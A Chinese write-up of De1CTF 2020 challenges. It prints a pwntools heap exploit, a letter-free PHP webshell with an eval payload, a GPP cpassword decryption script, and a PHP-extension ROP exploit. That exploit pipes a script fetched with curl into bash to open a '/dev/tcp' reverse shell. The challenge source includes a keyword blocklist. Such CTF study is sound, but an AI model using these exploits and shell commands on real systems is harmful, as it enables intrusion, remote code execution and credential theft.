2020-De1ctf-部分WP

May 7, 2020 CTF-Writeup 访问: 57 次

0输出……

pwn

stl_container

C++ stl写的,了解了以后,再来看这个题,会容易理解一些
在Vector类里面的erase函数存在漏洞,存在UAF漏洞
STL vector 的 erase(); 函数漏洞

我们只需要搞清楚mallocfree的地方,先把tcache填满,UAF泄露libc地址,然后double free来修改__free_hookone_gg

exp:

from pwn import *
import sys
context.log_level='debug'
debug = 1
file_name = './stl_container'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = ''
prot = ''
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

file = ELF(file_name)

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
'''
add
delete
show
'''
def mlist(chose,index,value):
    ru(">> ")
    sl("1")
    if chose==1:
        ru(">> ")
        sl(str(chose))
        ru("input data:")
        sd(value)
    elif chose==2:
        ru(">> ")
        sl(str(chose))
        ru("index?")
        sl(str(index))
    else:
        ru(">> ")
        sl(str(chose))
        ru("index?")
        sl(str(index))

def mvector(chose,index,value):
    ru(">> ")
    sl("2")
    if chose==1:
        ru(">> ")
        sl(str(chose))
        ru("input data:")
        sd(value)
    elif chose==2:
        ru(">> ")
        sl(str(chose))
        ru("index?")
        sl(str(index))
    else:
        ru(">> ")
        sl(str(chose))
        ru("index?")
        sl(str(index))

def mqueue(chose,index,value):
    ru(">> ")
    sl("3")
    if chose==1:
        ru(">> ")
        sl(str(chose))
        ru("input data:")
        sd(value)
    elif chose==2:
        ru(">> ")
        sl(str(chose))
    else:
        ru(">> ")
        sl(str(chose))
        ru("index?")
        sl(str(index))

def mstack(chose,index,value):
    ru(">> ")
    sl("4")
    if chose==1:
        ru(">> ")
        sl(str(chose))
        ru("input data:")
        sd(value)
    elif chose==2:
        ru(">> ")
        sl(str(chose))
    else:
        ru(">> ")
        sl(str(chose))
        ru("index?")
        sl(str(index))


def debug():
    gdb.attach(r)
    # raw_input()

# for x in range(2):
#     mvector(1,0,"aaaa")
#     mqueue(1,0,"aaaa")
#     mstack(1,0,"aaaa")
#     mlist(1,0,"aaaa")

# mqueue(2)
mlist(1,0,"bbbb")
mvector(1,0,"aaaa")
mqueue(1,0,"aaaa")
mstack(1,0,"aaaa")

mlist(1,0,"bbbb")
mvector(1,0,"aaaa")
mqueue(1,0,"aaaa")
mstack(1,0,"aaaa")


mlist(2,0,"test_2")
mlist(2,0,"test_2")

mqueue(2,0,"test_2")
mqueue(2,0,"test_2")

mstack(2,0,"test_2")
mstack(2,0,"test_2")


mvector(2,0,"test_2")

mvector(3,0,"test_2")#show
ru("data: ")
libc_base = u64(rud("\x0a").ljust(8,"\x00"))-0x3ebca0
li("libc_base",libc_base)
free_hook =  libc.symbols['__free_hook'] + libc_base
li("free_hook",free_hook)
one_gg = [0x4f2c5,0x4f322,0x10a38c]
one = one_gg[1]+libc_base

mlist(1,0,"bbbb")
mlist(1,0,"bbbb")


mvector(1,0,"aaaa")

mvector(2,0,"test_2")
mvector(2,0,"test_2")

mqueue(1,0,p64(free_hook))
mqueue(1,0,p64(one))

# debug()
ri()

web

check in

打开页面发现是文件上传,经过测试发现,不能上传php后缀的文件,文件内容也不能带有php字符串,尝试上传.htaccess,但是内容需要绕过php

AddType application/x-httpd-p\
hp .radish

YeiHtU.png

YeijXR.png

YeFCtO.png

index.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Cheek in</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" type="text/css" href="style/css/style1.css">
    <link rel="stylesheet" type="text/css" href="style/css/style2.css">
</head>
<?php
error_reporting(0);

$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
$typeAccepted = ["image/jpeg", "image/gif", "image/png"];
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);
}
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    $black = file_get_contents($tmp_name);
    if (!$tmp_name) {
        $result1 ="???";
    }else if (!$name) {
        $result1 ="filename cannot be empty!";
    }
    else if (preg_match("/ph|ml|js|cg/i", $name)) {
        $result1 = "filename error";
    }
    else if (!in_array($_FILES["fileUpload"]['type'], $typeAccepted)) {
        $result1 = 'filetype error';
    }
    else if (preg_match("/perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet/i",$black)){
        $result1 = "perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!";
    }
    else {
        $upload_file_path = $userdir . "/" . $name;
        move_uploaded_file($tmp_name, $upload_file_path);
        system("chmod +x ".$userdir."/*");
        $result2= "Your dir : " . $userdir. ' <br>';
        $result3= "Your files :" .$name.'<br>';
    }

}else{
    $result1 = 'upload your file';
}
?>
<body>
<div class="wrap">
    <div class="container">
        <h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1>
        <form action="index.php" method="post" enctype="multipart/form-data">
        <input class="wd" type="file" name="fileUpload" id="file"><br>
        <input class="wd" type="submit" name="upload" value="submit">
            <p class="change_link" style="text-align: center">
            <strong><?php print_r($result1);?></strong>
            </br>
            <strong><?php print_r($result3);?></strong>
            </br>
            <strong><?php print_r($result2);?></strong>
            </p>
        </form>
    </div>
</div>
</body>
</html>

Hard_Pentest 1

题目给了源码

<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  && 
        !in_array($exts, $BlackExts) && 
        !preg_match('/\.\./',$_FILES["file"]["name"])) {
          return true;
    }
    return false;
}
?>

限制文件名不能含有/../,并且上传的文件内容不能是字母或者是数字

这里用到了无字母数字WebShell

webshell:

<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$___=$_?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$____='_'?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$_=$$____?><?=$_[__]($_[_])?>

payload:

__=system&_=echo ^<?php eval($_REQUEST[a]); > a.php

蚁剑连上去,发现是windows,发现一个flag1_and_flag2hint.zip,但是有密码

查看用户发现有HintZip_Pass

C:\web\uploads\4d0713040392b6d22420537aeee44b29> net user /domain
The request will be processed at a domain controller for domain De1CTF2020.lab.
User accounts for \\dc.De1CTF2020.lab
-------------------------------------------------------------------------------
Administrator            De1ta                    Guest                    
HintZip_Pass             krbtgt                   web                      
The command completed successfully.

参考域渗透——利用SYSVOL还原组策略中保存的密码,来获取HintZip_Pass用户的密码

C:\web\uploads\4d0713040392b6d22420537aeee44b29> dir /s /a \\192.168.0.12\SYSVOL\*.xml
 Volume in drive \\192.168.0.12\SYSVOL has no label.
 Volume Serial Number is 30B1-A1C0
 Directory of \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups
04/15/2020  10:43 PM               478 Groups.xml
               1 File(s)            478 bytes
     Total Files Listed:
               1 File(s)            478 bytes
               0 Dir(s)  29,754,101,760 bytes free

C:\web\uploads\4d0713040392b6d22420537aeee44b29> type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>

dec.ps1

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param (
        [string] $Cpassword 
    )

    try {
        #Append appropriate padding based on string length  
        $Mod = ($Cpassword.length % 4)

        switch ($Mod) {
        '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
        '2' {$Cpassword += ('=' * (4 - $Mod))}
        '3' {$Cpassword += ('=' * (4 - $Mod))}
        }

        $Base64Decoded = [Convert]::FromBase64String($Cpassword)

        #Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        #Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length) 
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor() 
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    } 

    catch {Write-Error $Error[0]}
}  
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"

powershell运行即可得到密码

C:\web\uploads\4d0713040392b6d22420537aeee44b29> powershell -executionpolicy bypass -file test.ps1
zL1PpP@sSwO3d

解压得到flag1

mixture

这道题蛮有意思的,第一次做这个web pwn

admin登录进去发现select.php的功能是任意文件包含,我们把web源码down下来之后审计发现select.php引入了一个Minclude,猜测是自定义的一个php扩展库

<?php
include "profile.php";
$search = $_POST['search'];

if($_SESSION['admin']==1){
    print <<<EOT
<form class="form" action="select.php" method="post">
    <div class="form-group">
        <label for="disabledTextInput">You can search anything here!!</label></br>
        <input type="text" name="search" id="fromgo" class="form-control">
    </div>
    </div>
    <div class="form-group">
        <input type="submit" name="submit" class="btn btn-info btn-md" value="submit">
    </div>
</form>
EOT;
}
else{
    print <<<EOT
  <div class="container"> 
    <div class="row"  >           
            <div class="col-md-10 col-md-offset-4">             
                <div class="input-group" display:block;margin:0 auto;>                                                   
                            <button class="btn btn-info btn-search " type="button" >You are not admin or not enough money!</button>
                             </span>

                </div><!-- /input-group -->             
            </div><!-- /.col-lg-6 --> 
    </div>
  </div>
EOT;
}
if($_SESSION['admin']==1&&!empty($search)){
    //var_dump(urldecode($search));
    Minclude(urldecode($search));
    //lookup($search);
}

admin页面是显示了phpinfo,我们可以得到php.ini的路径,将其包含出来

; Local Variables:
; tab-width: 4
; End:
extension=/usr/local/lib/php/extensions/no-debug-non-zts-20170718/Minclude.so

得到Minclude.so自定义库的路径,也将其包含出来,拖到IDA里面发现存在花指令,修复之后

void __fastcall zif_Minclude(zend_execute_data *execute_data, zval *return_value)
{
  zval *v2; // r12
  unsigned __int64 v3; // rsi
  FILE *v4; // rbx
  __int64 v5; // rax
  void *src; // [rsp+0h] [rbp-98h]
  size_t n; // [rsp+8h] [rbp-90h]
  char dest; // [rsp+10h] [rbp-88h]
  int v9; // [rsp+70h] [rbp-28h]
  char *v10; // [rsp+74h] [rbp-24h]

  v2 = return_value;
  src = 0LL;
  memset(&dest, 0, 0x60uLL);
  v9 = 0;
  v10 = &dest;
  if ( zend_parse_parameters(execute_data->This.u2.next, "s", &src, &n) != -1 )
  {
    memcpy(&dest, src, n);
    php_printf("%s", &dest);
    php_printf("<br>", &dest);
    v3 = "rb";
    v4 = fopen(&dest, "rb");
    if ( v4 )
    {
      while ( !feof(v4) )
      {
        v3 = fgetc(v4);
        php_printf("%c", v3);
      }
      php_printf("\n", v3);
    }
    else
    {
      php_printf("no file\n", "rb");
    }
    v5 = zend_strpprintf(0LL, "True");
    v2->value.lval = v5;
    v2->u1.type_info = (*(v5 + 5) & 2u) < 1 ? 5126 : 6;
  }
}

可以看到memcpy有明显的栈溢出,接下来就是ROP来,很显然这不能想以往的pwn来直接获取shell,但是我们可以执行shell命令,我们可以反弹到服务器上一个shell

调试:
官网给了题目的docker环境,启动了docker之后,在里面安装gdb和pwndbg,程序没有开启canary

创建一个test.php

<?php
$path = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
Minclude($path);

?>

这肯定是可以溢出的

root@15672d5206a8:/var/www/html# gdb php
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 179 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from php...(no debugging symbols found)...done.
pwndbg> set args -f test.php
pwndbg> r
Starting program: /usr/local/bin/php -f test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�'��<br>no file

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7fcc361 in zif_Minclude (execute_data=<optimized out>, return_value=<optimized out>) at /root/php-7.2.26/ext/Minclude/Minclude.c:134
134 /root/php-7.2.26/ext/Minclude/Minclude.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────
 RAX  0x1406
 RBX  0x6161616161616161 ('aaaaaaaa')
 RCX  0x0
 RDX  0x4
 RDI  0x7ffff428a000 ◂— 0x600000001
 RSI  0x1
 R8   0x7ffff74348c0 (_IO_stdfile_1_lock) ◂— 0x0
 R9   0x7ffff7fcd021 ◂— 0x62616e6500632500
 R10  0x0
 R11  0x5555559a36b0 (zend_strpprintf) ◂— sub    rsp, 0xd8
 R12  0x6161616161616161 ('aaaaaaaa')
 R13  0x7ffff421c0b0 ◂— 0x0
 R14  0x7ffff421c030 —▸ 0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 R15  0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 RBP  0x6161616161616161 ('aaaaaaaa')
 RSP  0x7fffffffaf58 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
 RIP  0x7ffff7fcc361 (zif_Minclude+321) ◂— ret
───────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────
 ► 0x7ffff7fcc361 <zif_Minclude+321>    ret    <0x6161616161616161>










───────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fffffffaf58 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... ↓
─────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────
 ► f 0     7ffff7fcc361 zif_Minclude+321
   f 1 6161616161616161
   f 2 6161616161616161
   f 3 6161616161616161
   f 4 6161616161616161
   f 5 6161616161616161
   f 6 6161616161616161
   f 7 6161616161616161
   f 8 6161616161616161
   f 9 6161616161616161
   f 10 6161616161616161
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

可以看到程序流已经成功的劫持了,在/root/php-7.2.26/ext/Minclude/Minclude.c:95下断点

pwndbg> b /root/php-7.2.26/ext/Minclude/Minclude.c:95
Breakpoint 1 at 0x7ffff7fcc270: file /root/php-7.2.26/ext/Minclude/Minclude.c, line 98.
pwndbg> r
Starting program: /usr/local/bin/php -f test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, zif_Minclude (execute_data=0x7ffff421c0b0, return_value=0x7fffffffafb0) at /root/php-7.2.26/ext/Minclude/Minclude.c:98
98  /root/php-7.2.26/ext/Minclude/Minclude.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────
 RAX  0x7fffffffaed0 ◂— 0x0
 RBX  0x7fffffffaed0 ◂— 0x0
 RCX  0x0
 RDX  0x5555562f6120 ◂— 0x10000000001
 RDI  0x7fffffffaf30 ◂— 0xffffaed000000000
 RSI  0x7fffffffafb0 —▸ 0x5555562b78b0 (executor_globals+304) ◂— 0x800700000001
 R8   0x7ffff421c0b0 ◂— 0x0
 R9   0x555556303880 ◂— 0x0
 R10  0x0
 R11  0x206
 R12  0x7fffffffafb0 —▸ 0x5555562b78b0 (executor_globals+304) ◂— 0x800700000001
 R13  0x7ffff421c0b0 ◂— 0x0
 R14  0x7ffff421c030 —▸ 0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 R15  0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 RBP  0x5555562f6120 ◂— 0x10000000001
 RSP  0x7fffffffaec0 ◂— 0x0
 RIP  0x7ffff7fcc270 (zif_Minclude+80) ◂— mov    edi, dword ptr [r8 + 0x2c]
───────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────
 ► 0x7ffff7fcc270 <zif_Minclude+80>     mov    edi, dword ptr [r8 + 0x2c]
   0x7ffff7fcc274 <zif_Minclude+84>     lea    rcx, [rsp + 8]
   0x7ffff7fcc279 <zif_Minclude+89>     mov    rdx, rsp
   0x7ffff7fcc27c <zif_Minclude+92>     lea    rsi, [rip + 0xd87]
   0x7ffff7fcc283 <zif_Minclude+99>     call   zend_parse_parameters@plt <0x7ffff7fcc030>

   0x7ffff7fcc288 <zif_Minclude+104>    cmp    eax, -1
   0x7ffff7fcc28b <zif_Minclude+107>    je     zif_Minclude+313 <0x7ffff7fcc359>

   0x7ffff7fcc291 <zif_Minclude+113>    mov    rdx, qword ptr [rsp + 8]
   0x7ffff7fcc296 <zif_Minclude+118>    mov    rsi, qword ptr [rsp]
   0x7ffff7fcc29a <zif_Minclude+122>    mov    rdi, rbx
   0x7ffff7fcc29d <zif_Minclude+125>    call   memcpy@plt <0x7ffff7fcc080>
───────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────
00:0000│ rsp      0x7fffffffaec0 ◂— 0x0
01:0008│          0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax
02:0010│ rax rbx  0x7fffffffaed0 ◂— 0x0
... ↓
─────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────
 ► f 0     7ffff7fcc270 zif_Minclude+80
   f 1     555555a437ae execute_ex+19086
   f 2     555555a46d28 zend_execute+296
   f 3     5555559a4583 zend_execute_scripts+195
   f 4     555555941b78 php_execute_script+744
   f 5     555555a4925e
   f 6     5555556c72bc
   f 7     7ffff729b09b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
0x00007ffff7fcc283  98  in /root/php-7.2.26/ext/Minclude/Minclude.c
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────
 RAX  0x7fffffffaed0 ◂— 0x0
 RBX  0x7fffffffaed0 ◂— 0x0
 RCX  0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax
 RDX  0x7fffffffaec0 ◂— 0x0
 RDI  0x1
 RSI  0x7ffff7fcd00a ◂— 0x72003e72623c0073 /* 's' */
 R8   0x7ffff421c0b0 ◂— 0x0
 R9   0x555556303880 ◂— 0x0
 R10  0x0
 R11  0x206
 R12  0x7fffffffafb0 —▸ 0x5555562b78b0 (executor_globals+304) ◂— 0x800700000001
 R13  0x7ffff421c0b0 ◂— 0x0
 R14  0x7ffff421c030 —▸ 0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 R15  0x7ffff427c100 —▸ 0x555555a4377d (execute_ex+19037) ◂— mov    r13, qword ptr [r14 + 8]
 RBP  0x5555562f6120 ◂— 0x10000000001
 RSP  0x7fffffffaec0 ◂— 0x0
 RIP  0x7ffff7fcc283 (zif_Minclude+99) ◂— call   0x7ffff7fcc030
───────────────────────────────────────────────────────────────────────────[ DISASM ]───────────────────────────────────────────────────────────────────────────
   0x7ffff7fcc270 <zif_Minclude+80>     mov    edi, dword ptr [r8 + 0x2c]
   0x7ffff7fcc274 <zif_Minclude+84>     lea    rcx, [rsp + 8]
   0x7ffff7fcc279 <zif_Minclude+89>     mov    rdx, rsp
   0x7ffff7fcc27c <zif_Minclude+92>     lea    rsi, [rip + 0xd87]
 ► 0x7ffff7fcc283 <zif_Minclude+99>     call   zend_parse_parameters@plt <0x7ffff7fcc030>
        rdi: 0x1
        rsi: 0x7ffff7fcd00a ◂— 0x72003e72623c0073 /* 's' */
        rdx: 0x7fffffffaec0 ◂— 0x0
        rcx: 0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax

   0x7ffff7fcc288 <zif_Minclude+104>    cmp    eax, -1
   0x7ffff7fcc28b <zif_Minclude+107>    je     zif_Minclude+313 <0x7ffff7fcc359>

   0x7ffff7fcc291 <zif_Minclude+113>    mov    rdx, qword ptr [rsp + 8]
   0x7ffff7fcc296 <zif_Minclude+118>    mov    rsi, qword ptr [rsp]
   0x7ffff7fcc29a <zif_Minclude+122>    mov    rdi, rbx
   0x7ffff7fcc29d <zif_Minclude+125>    call   memcpy@plt <0x7ffff7fcc080>
───────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────
00:0000│ rdx rsp  0x7fffffffaec0 ◂— 0x0
01:0008│ rcx      0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax
02:0010│ rax rbx  0x7fffffffaed0 ◂— 0x0
... ↓
─────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────
 ► f 0     7ffff7fcc283 zif_Minclude+99
   f 1     555555a437ae execute_ex+19086
   f 2     555555a46d28 zend_execute+296
   f 3     5555559a4583 zend_execute_scripts+195
   f 4     555555941b78 php_execute_script+744
   f 5     555555a4925e
   f 6     5555556c72bc
   f 7     7ffff729b09b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

可以算出来ret地址偏移是0x88

在栈偏移100处有一个栈地址,我们可以利用php_printf("%s", &dest);泄露它,然后构造ROP

libc地址该如何泄露呢,所有apache2进程都是fork出来的,fork出来的进程的pie和aslr一样,在一个进程里包含/proc/self/maps就能得到所有进程的pie偏移,所以包含/proc/self/maps来泄露libc基地址

服务器上放的文件
aaa.txt

bash -i >& /dev/tcp/**.**.**.**/12345 0>&1

exp.py

from pwn import *
import requests
import urllib
import struct

url = "http://134.175.185.244/select.php"
# url = "http://49.51.251.99/select.php"
# url = "http://192.168.1.109/select.php"
# cookie ={
#     "PHPSESSID": "spnmkr49ajvc1n0bl32npv5njn"
# }

cookie ={
    "PHPSESSID": "p6jfsk2hrc7mii0k2pkajr22ms"
}

# res = requests.post(url,data=data,cookies=cookie)
# print(res.status_code)
payload = "a"*100
data = {
    'search':"a"*100,
    'submit':"submit"
}

res = requests.post(url,data=data,cookies=cookie)
# print(res.content)
res = res.content.split(b'a'*100)[1]
stack = res[0:6]+b'\x00\x00'
stack = struct.unpack('<Q', stack)[0]
print("[+] stack:", hex(stack))

data = {
    'search': "/proc/self/maps", 
    'submit':"submit"
}
res = requests.post(url,data=data,cookies=cookie).content.split(b"\n")
# print res
for i in res:
    if b"libc-2.28.so" in i:
        print i;
        libc_base = int(b"0x" + i[0:12], 16)
        break
print("[+] libc_base:", hex(libc_base))


pop_rdi_ret = 0x0000000000023a5f + libc_base
system_addr = 0x449c0 + libc_base

shell = b""
# payload = "a"*0x88+p64(pop_rdi_ret)+p64(stack+0x88+0x18)+p64(system_addr)+b"curl 192.168.1.112 | bash\x00"
payload = "a"*0x88+p64(pop_rdi_ret)+p64(stack+0x88+0x18)+p64(system_addr)+b"curl radishes.top/aaa.txt | bash\x00"


data = {
    'search':payload, 
    'submit':"submit"
}

res = requests.post(url,data=data,cookies=cookie)

服务器上监听端口nc -lvvp 12345,拿到shell之后发现是readflag来拿flag

参考https://www.zhaoj.in/read-5479.html,执行trap “” 14(终端捕捉到 SIGALRM 信号时啥都不做)

然后再运行readflag来拿flag即可

www-data@22345a76257a:/$ cat flag
cat flag
cat: flag: Permission denied
www-data@22345a76257a:/$ ./readflag
./readflag
Solve the easy challenge first
(((((956115)-(763688))+(679286))-(112584))+(449894))
input your answer: bash: [6764: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@22345a76257a:/$ trap "" 14
trap "" 14
www-data@22345a76257a:/$ /readflag
/readflag
Solve the easy challenge first
(((((778617)-(484965))-(723852))+(-1007908))+(-494283))
input your answer: -1932391
ok! here is your flag!!
De1CTF{47ae3396-f5ce-47ab-bb64-34b5154064c4}

添加新评论